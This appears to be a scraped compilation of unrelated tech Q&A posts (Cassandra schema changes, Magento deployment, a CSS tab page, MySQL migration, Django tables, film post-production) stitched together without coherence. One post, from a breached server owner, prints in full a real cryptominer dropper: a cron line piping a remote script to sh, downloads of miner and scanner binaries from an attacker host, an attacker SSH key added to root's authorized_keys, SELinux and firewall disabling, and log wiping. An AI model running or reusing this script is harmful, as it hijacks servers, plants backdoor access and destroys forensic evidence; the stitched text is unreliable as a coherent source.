Production availability impact of adding column to existing Cassandra table?

It appears that adding a column to an existing table in a production Cassandra cluster is pretty common. Under what conditions is it considered acceptable/safe to do so, in terms of availability and performance?

If it’s difficult or impossible to give a clear-cut answer, how would the expected impact be characterized? Impact might be expressed as, e.g., simply “no expected availability impact”; Big-O notation; or empirical measurements such as the duration of the add operation, the change in request latencies for the affected Cassandra cluster or (end to end) for a client service, or the change in CPU or memory utilization of the affected cluster. Citations of good resources on the topic would be helpful.
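For context, in current Cassandra versions an `ALTER TABLE … ADD` is a schema (metadata) change only: existing SSTables are not rewritten, so it normally completes in seconds with no expected availability impact. The usual caveats are to avoid concurrent schema changes and to run it while all nodes are up, so the cluster reaches schema agreement. A sketch (keyspace, table, and column names here are made up):

```cql
-- Hypothetical table; adding a column updates cluster schema metadata only,
-- it does not rewrite existing SSTables.
ALTER TABLE my_keyspace.users ADD last_login timestamp;
-- Existing rows simply read back null for the new column.
```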

My production Ubuntu server was breached through Redis and I found this script. Is it a decoy?

A few days ago my VPS came under heavy load from spammers attempting SSH attacks and script injections. I have since added new fail2ban regexps and new security measures for Redis, which appears to be how they got in. I found this entry in the redis and root users’ crontabs.

*/1 * * * * cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 

Had there been an “l” at the end of “cur”, that would have been the end of my server. I (carefully) downloaded and inspected the script; it would have run this apparent crypto miner:

setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="854364"
sh_url="https://de.gsearch.com.de/api/update.sh"
sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
config_url="https://de.gsearch.com.de/api/config.json"
config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
config_size="4954"
scan_url="https://de.gsearch.com.de/api/networkservice"
scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
scan_size="2584072"
watchdog_url="https://de.gsearch.com.de/api/sysguard"
watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
watchdog_size="1929480"

kill_miner_proc() {
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f systemctI
    pkill -f WmiPrwSe
    pkill -f sysguard
    pkill -f sysupdate
    pkill -f networkservice
    crontab -r
    rm -rf /var/spool/cron/*
}

downloads() {
    if [ -f "/usr/bin/curl" ]
    then
        echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
        then
            wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

kill_sus_proc() {
    ps axf -o "pid"|while read procid
    do
        ls -l /proc/$procid/exe | grep /tmp
        if [ $? -ne 1 ]
        then
            cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
            if [ $? -ne 0 ]
            then
                kill -9 $procid
            else
                echo "don't kill"
            fi
        fi
    done
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
        cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
        if [ $? -ne 0 ]
        then
            kill -9 $procid
        else
            echo "don't kill"
        fi
    done
}

kill_miner_proc
kill_sus_proc

if [ -f "$rtdir" ]
then
    echo "i am root"
    echo "goto 1" >> /etc/sysupdate
    chattr -i /etc/sysupdate*
    chattr -i /etc/config.json*
    chattr -i /etc/update.sh*
    chattr -i /root/.ssh/authorized_keys*
    chattr -i /etc/networkservice
    if [ ! -f "/usr/bin/crontab" ]
    then
        echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
    else
        [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
    fi
    chmod 700 /root/.ssh/
    echo >> /root/.ssh/authorized_keys
    chmod 600 root/.ssh/authorized_keys
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys
    cfg="/etc/config.json"
    file="/etc/sysupdate"
    if [-f "/etc/config.json" ]
    then
        filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
        if [ "$filesize_config" -ne "$config_size" ]
        then
            pkill -f sysupdate
            rm /etc/config.json
            downloads $config_url /etc/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /etc/config.json $config_url_backup
    fi
    if [ -f "/etc/sysupdate" ]
    then
        filesize1=`ls -l /etc/sysupdate | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$miner_size" ]
        then
            pkill -f sysupdate
            rm /etc/sysupdate
            downloads $miner_url /etc/sysupdate $miner_url_backup
        else
            echo "not need download"
        fi
    else
        downloads $miner_url /etc/sysupdate $miner_url_backup
    fi
    if [ -f "/etc/sysguard" ]
    then
        filesize1=`ls -l /etc/sysguard | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$watchdog_size" ]
        then
            pkill -f sysguard
            rm /etc/sysguard
            downloads $watchdog_url /etc/sysguard $watchdog_url_backup
        else
            echo "not need download"
        fi
    else
        downloads $watchdog_url /etc/sysguard $watchdog_url_backup
    fi
    downloads $sh_url /etc/update.sh $sh_url_backup
    if [ -f "/etc/networkservice" ]
    then
        filesize2=`ls -l /etc/networkservice | awk '{ print $5 }'`
        if [ "$filesize2" -ne "$scan_size" ]
        then
            pkill -f networkservice
            rm /etc/networkservice
            downloads $scan_url /etc/networkservice $scan_url_backup
        else
            echo "not need download"
        fi
    else
        downloads $scan_url /etc/networkservice $scan_url_backup
    fi
    chmod 777 /etc/sysupdate
    ps -fe|grep sysupdate |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /etc
        echo "not root runing"
        sleep 5s
        ./sysupdate &
    else
        echo "root runing....."
    fi
    chmod 777 /etc/networkservice
    ps -fe|grep networkservice |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /etc
        echo "not roots runing"
        sleep 5s
        ./networkservice &
    else
        echo "roots runing....."
    fi
    chmod 777 /etc/sysguard
    ps -fe|grep sysguard |grep -v grep
    if [ $? -ne 0 ]
    then
        echo "not tmps runing"
        cd /etc
        chmod 777 sysguard
        sleep 5s
        ./sysguard &
    else
        echo "roots runing....."
    fi
    chmod 777 /etc/sysupdate
    chattr +i /etc/sysupdate
    chmod 777 /etc/networkservice
    chattr +i /etc/networkservice
    chmod 777 /etc/config.json
    chattr +i /etc/config.json
    chmod 777 /etc/update.sh
    chattr +i /etc/update.sh
    chmod 777 /root/.ssh/authorized_keys
    chattr +i /root/.ssh/authorized_keys
else
    echo "goto 1" > /tmp/sysupdates
    chattr -i /tmp/sysupdate*
    chattr -i /tmp/networkservice
    chattr -i /tmp/config.json*
    chattr -i /tmp/update.sh*
    if [ ! -f "/usr/bin/crontab" ]
    then
        echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
    else
        [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
    fi
    if [ -f "/tmp/config.json" ]
    then
        filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$config_size" ]
        then
            pkill -f sysupdate
            rm /tmp/config.json
            downloads $config_url /tmp/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /tmp/config.json $config_url_backup
    fi
    if [ -f "/tmp/sysupdate" ]
    then
        filesize1=`ls -l /tmp/sysupdate | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$miner_size" ]
        then
            pkill -f sysupdate
            rm /tmp/sysupdate
            downloads $miner_url /tmp/sysupdate $miner_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $miner_url /tmp/sysupdate $miner_url_backup
    fi
    if [ -f "/tmp/sysguard" ]
    then
        filesize1=`ls -l /tmp/sysguard | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$watchdog_size" ]
        then
            pkill -f sysguard
            rm /tmp/sysguard
            downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
        else
            echo "not need download"
        fi
    else
        downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
    fi
    echo "i am here"
    downloads $sh_url /tmp/update.sh $sh_url_backup
    if [ -f "/tmp/networkservice" ]
    then
        filesize2=`ls -l /tmp/networkservice | awk '{ print $5 }'`
        if [ "$filesize2" -ne "$scan_size" ]
        then
            pkill -f networkservice
            rm /tmp/networkservice
            downloads $scan_url /tmp/networkservice $scan_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $scan_url /tmp/networkservice $scan_url_backup
    fi
    ps -fe|grep sysupdate |grep -v grep
    if [ $? -ne 0 ]
    then
        echo "not tmp runing"
        cd /tmp
        chmod 777 sysupdate
        sleep 5s
        ./sysupdate &
    else
        echo "tmp runing....."
    fi
    ps -fe|grep networkservice |grep -v grep
    if [ $? -ne 0 ]
    then
        echo "not tmps runing"
        cd /tmp
        chmod 777 networkservice
        sleep 5s
        ./networkservice &
    else
        echo "tmps runing....."
    fi
    ps -fe|grep sysguard |grep -v grep
    if [ $? -ne 0 ]
    then
        echo "not tmps runing"
        cd /tmp
        chmod 777 sysguard
        sleep 5s
        ./sysguard &
    else
        echo "tmps runing....."
    fi
    chmod 777 /tmp/sysupdate
    chattr +i /tmp/sysupdate
    chmod 777 /tmp/networkservice
    chattr +i /tmp/networkservice
    chmod 777 /tmp/sysguard
    chattr +i /tmp/sysguard
    chmod 777 /tmp/update.sh
    chattr +i /tmp/update.sh
    chmod 777 /tmp/config.json
    chattr +i /tmp/config.json
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history

My question is, why is there no “l” in curl? Is this a decoy and I still have malicious software somewhere in my server? Is it white hats just telling me they found an exploit? Did some anti malware floating around in cyberspace change the malicious script?
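For what it’s worth, the script above leaves fairly distinctive artifacts: renamed `cur`/`wge` binaries, dropped `sysupdate`/`sysguard`/`networkservice`/`update.sh` files (made immutable with `chattr +i`), and a `*/30` cron entry. A rough check for those indicators, with paths taken from the script itself, might look like this (a sketch, not a full forensic procedure):

```shell
# Look for the exact files the dropper creates or renames.
found=0
for f in /usr/bin/cur /usr/bin/wge \
         /etc/sysupdate /etc/sysguard /etc/networkservice /etc/update.sh \
         /tmp/sysupdate /tmp/sysguard /tmp/networkservice /tmp/update.sh; do
    if [ -e "$f" ]; then
        echo "suspicious file: $f"
        found=1
    fi
done
if [ "$found" -eq 0 ]; then
    echo "no known IoC files found"
fi
```

Even if this comes back clean, the safest course after a root-level compromise is to rebuild the host rather than trust any single check.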

How to deploy to production server customizations made in vendor folder?

So, we have 3 environments: development, staging and production.

The .gitignore file includes the “vendor” folder, and that has been working fine for us. Once we pull changes in staging we just run:

composer install
php bin/magento setup:upgrade && php bin/magento setup:di:compile && php bin/magento setup:static-content:deploy && php bin/magento c:enable && php bin/magento c:c

The issue is: we had to customize a third-party extension installed by Composer (under the “vendor” folder), and that path is ignored by Git. What should I do to keep track of these changes and deploy them to the staging server?

I could “git add -f ” the customized files, but I would like your opinion on best practices.
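The `git add -f` route does work: it force-tracks just the customized files so they survive even though `vendor/` is ignored. A throwaway sketch (the repo layout and file names here are made up):

```shell
set -e
repo=$(mktemp -d) && cd "$repo"
git init -q
git config user.email dev@example.com && git config user.name dev
echo "vendor/" > .gitignore
git add .gitignore && git commit -qm "ignore vendor"
mkdir -p vendor/acme/widget
echo "<?php // customized" > vendor/acme/widget/File.php
# vendor/ is ignored, so a plain add is refused:
git add vendor/acme/widget/File.php 2>/dev/null || echo "refused: path is ignored"
# -f overrides .gitignore for just this one file:
git add -f vendor/acme/widget/File.php
git commit -qm "track customized vendor file"
git ls-files vendor/
```

That said, a more maintainable pattern is to keep the change as a patch applied by `cweagans/composer-patches` (or to fork the package and require your fork), so that `composer install` reproduces the customization instead of Git carrying vendor code that the next `composer update` can silently overwrite.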

How can I move my site into production?

Can you please help me with a proper explanation? I am unable to publish my site.

*{margin:0; padding:0;}
body{font-family:tahoma; font-size:16px;}
ul,ol,li{list-style-type:none;}
ol.tabs_content > li{display:none;}
a{text-decoration:none;}
:focus{outline:none;}
.wrap{display:flex; width:100%; margin: 0 auto;}
ul.tabs{width:20%; background:#ccc;}
ul.tabs li a{background:#ccc; color:#000; padding:30px 20px; display:block; border-bottom:1px solid #fff;}
ul.tabs li a:hover{background:#525efa; color:#fff;}
ul.tabs li a.active{background:#525efa; color:#fff;}
ol.tabs_content{background:#525efa; width:80%; padding: 30px; box-sizing: border-box;}
ol.tabs_content li h2{margin-bottom: 30px; color: #fff; border-bottom: 1px solid #fff; padding-bottom: 20px;}
.green p{margin-bottom:10px;}
.green p a, p{color:#fff;}
i{color:#fff; font-size:20px !important; margin-right:8px;}


/* Now the CSS */
* {margin: 0; padding: 0;}

.tree ul { padding-top: 20px; position: relative; width:100%; min-height:400px; transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; width:100%; }

.tree li { float: left; text-align: center; list-style-type: none; position: relative; padding: 20px 5px 0 5px;

transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; 

}

/* We will use ::before and ::after to draw the connectors */

.tree li::before, .tree li::after{ content: ''; position: absolute; top: 0; right: 50%; border-top: 1px solid #fff; width: 50%; height: 20px; }
.tree li::after{ right: auto; left: 50%; border-left: 1px solid #fff; }

/* We need to remove left-right connectors from elements without any siblings */
.tree li:only-child::after, .tree li:only-child::before { display: none; }

/* Remove space from the top of single children */
.tree li:only-child{ padding-top: 0;}

/* Remove left connector from first child and right connector from last child */
.tree li:first-child::before, .tree li:last-child::after{ border: 0 none; }
/* Adding back the vertical connector to the last nodes */
.tree li:last-child::before{ border-right: 1px solid #ccc; border-radius: 0 5px 0 0; -webkit-border-radius: 0 5px 0 0; -moz-border-radius: 0 5px 0 0; }
.tree li:first-child::after{ border-radius: 5px 0 0 0; -webkit-border-radius: 5px 0 0 0; -moz-border-radius: 5px 0 0 0; }

/* Time to add downward connectors from parents */
.tree ul ul::before{ content: ''; position: absolute; top: 0; left: 50%; border-left: 1px solid #ccc; width: 0; height: 20px; }

.tree li a{ border: 1px solid #fff; padding: 5px 10px; text-decoration: none; color: #666; font-family: arial, verdana, tahoma; font-size: 11px; display: inline-block; background-color:#fff;

border-radius: 5px; -webkit-border-radius: 5px; -moz-border-radius: 5px;  transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; 

}

/* Time for some hover effects */
/* We will apply the hover effect to the lineage of the element also */
.tree li a:hover, .tree li a:hover+ul li a { background: #ccc; color: #000; border: 1px solid #94a0b4; }
/* Connector styles on hover */
.tree li a:hover+ul li::after, .tree li a:hover+ul li::before, .tree li a:hover+ul::before, .tree li a:hover+ul ul::before{ border-color: #fff; }

.w350{width:350px;} .w140{width:140px;} .w170{width:170px;}

.block{display:block; font-size:14px; text-transform:uppercase;} .marT20{margin-top:10px;} .tree{width:100%; text-align:center;}

/* That's all. I hope you enjoyed it. Thanks 🙂 */

  • Org Structure
  • Social Network
  • Customer Contact
  • Order Fill
  • Org Structure

    • CEO
        Director

          Staff

          Staff

        Director

        Director

    Social Network

    Facebook

    LinkedIn

    Twitter

    Customer Contact

    Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.

    Order Fill

    Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.

window.jQuery || document.write('…');
(function($j){
    $j('ul.tabs > li a').click(function(){
        $j('ul.tabs > li a').removeClass('active');
        $j(this).addClass('active');
        var currentIndex = $j(this).parent().index() + 1;
        $j('ol.tabs_content > li').hide();
        $j(this).parents('.wrap').find('ol.tabs_content > li:nth-child(' + currentIndex + ')').show();
    });
})(jQuery);

Magento2: Production Critical Error on Cloudinary

When I run the setup:upgrade command I get the following error:

PHP Fatal error: Uncaught Error: Call to a member function getCloud() on null in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php:149
Stack trace:
#0 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Core/ConfigurationBuilder.php(20): Cloudinary\Cloudinary\Model\Configuration->getCloud()
#1 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(156): Cloudinary\Cloudinary\Core\ConfigurationBuilder->build()
#2 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(150): Cloudinary\Cloudinary\Model\BatchDownloader->_authorise()
#3 /var/www/asprod/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php(111): Cloudinary\Cloudinary\Model\BatchDownloader->__construct(Object(Cloudinary\Cloudinary\Model\Configuration), Object(Cloudinary\Cloudinary\Core\ConfigurationBuilder), Object(Cloudinary\Cloudinary\Model\MigrationTask), Object(Cloudinary\Api), Object(Magento\Framework\App\Filesystem\DirectoryList), Object(Magento\Framework\HTTP\Adapter\ in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php on line 149

I am using these steps to install Cloudinary:

composer require cloudinary/cloudinary-magento2
php bin/magento maintenance:enable
php bin/magento setup:upgrade
php bin/magento setup:di:compile
php bin/magento setup:static-content:deploy
php bin/magento maintenance:disable
php bin/magento cache:flush

I am using PHP 7.0, Magento 2.2.0 and Ubuntu 18.04. Without the Cloudinary extension everything works fine, but then the site doesn't display any images, since they are all hosted on Cloudinary.
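A `getCloud() on null` during CLI runs is often reported when the extension has not yet been given its Cloudinary credentials. One workaround sometimes suggested (assuming the module name is `Cloudinary_Cloudinary`; confirm it in `app/etc/config.php`) is to disable the module, finish the upgrade, save the Cloudinary configuration in the admin, then re-enable it. A non-runnable sketch of that sequence:

```
php bin/magento module:disable Cloudinary_Cloudinary
php bin/magento setup:upgrade
# …save the Cloudinary cloud name / API key / secret in the admin…
php bin/magento module:enable Cloudinary_Cloudinary
php bin/magento setup:upgrade && php bin/magento setup:di:compile
```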


Migration from MySQL to a NoSQL database in production without code changes, and MySQL without foreign keys and indexes

I have two scenarios here:

1. Migrating a MySQL database to NoSQL without code changes (no ORMs are used).
2. Using no foreign keys and no indexes in MySQL (because they want to migrate to a different database in the future).
3. All of this done with very little code change.

These questions were asked by my team lead, and I don't have a proper answer for him, because it seems very unlikely to run MySQL with no indexes and no foreign keys; and if they aren't meant to use MySQL, why did they choose it in the first place?

1. I want to know whether people in the software industry often do it this way, or whether they choose whatever fits their needs.
2. They say that foreign-key validations are done at the API level, not at the MySQL level.

I don't fully understand their reasoning, because I have little experience, so I don't have an answer for why they say this. Please give me some insight into whether this is good practice or not.
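For concreteness, “foreign-key validation at the API level” means the application checks that a referenced row exists before inserting, instead of letting the database enforce it. A toy sketch using the `sqlite3` CLI (the `users`/`orders` tables are hypothetical; note this check is racy without a transaction, which is exactly the trade-off being debated):

```shell
db=$(mktemp)
sqlite3 "$db" "CREATE TABLE users(id INTEGER PRIMARY KEY);
               CREATE TABLE orders(id INTEGER PRIMARY KEY, user_id INTEGER);"
sqlite3 "$db" "INSERT INTO users(id) VALUES (1);"

# Application-level "foreign key": validate before insert, no DB constraint.
insert_order() {
    exists=$(sqlite3 "$db" "SELECT COUNT(*) FROM users WHERE id=$2;")
    if [ "$exists" -eq 0 ]; then
        echo "rejected: user $2 does not exist"
    else
        sqlite3 "$db" "INSERT INTO orders(id, user_id) VALUES ($1, $2);"
        echo "inserted order $1"
    fi
}

insert_order 10 1   # referenced user exists, so the insert goes through
insert_order 11 99  # no such user, so the application rejects it
```

Whether this is good practice depends on how much you trust every code path to do the check; a declared constraint in the database cannot be bypassed, while an API-level check can.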

How should I update non-maintained database tables between production and development?

I'm working on a Django web application (with a MySQL back-end) that uses non-maintained tables (tables not modified by the web app). However, I have two copies of the data tables (one for production and one for development).

A problem occurs when I need to manually modify the non-maintained data in the development version: because there are two separate tables, I then need to manually update the corresponding data in the production version as well.

Is there a recommended form of version control for the non-maintained tables? I was thinking of using SQLite for the non-maintained data tables and letting Git track their files.
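One caveat with tracking a binary SQLite file directly is that Git cannot diff it meaningfully; a common variant of the same idea is to commit a plain-text dump instead, which diffs and merges like any other source file. A throwaway sketch (the `lookup_codes` table name is made up):

```shell
set -e
work=$(mktemp -d) && cd "$work"
git init -q
git config user.email dev@example.com && git config user.name dev
# "lookup_codes" stands in for a non-maintained reference table.
sqlite3 ref.db "CREATE TABLE lookup_codes(code TEXT, label TEXT);
                INSERT INTO lookup_codes VALUES ('A','Alpha');"
sqlite3 ref.db .dump > ref.sql      # plain-text dump diffs cleanly in Git
git add ref.sql && git commit -qm "snapshot reference tables"
git ls-files
```

The same pattern works against MySQL with `mysqldump --skip-extended-insert` for the specific tables, which keeps one row per line so diffs between environments stay readable.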

Jobs In Audio Video Editing And Post Production

Film making is not an easy task; to make it simpler it has been split into 3 main sections, i.e. Pre-production, Production and Post-production. Let's discuss these three in brief:
Pre-production: preparations are made for the shoot; the cast and crew are hired, locations are selected and sets are built.
Production: the raw materials for the finished film are recorded.
Post-production: turns individual scenes, called raw footage…
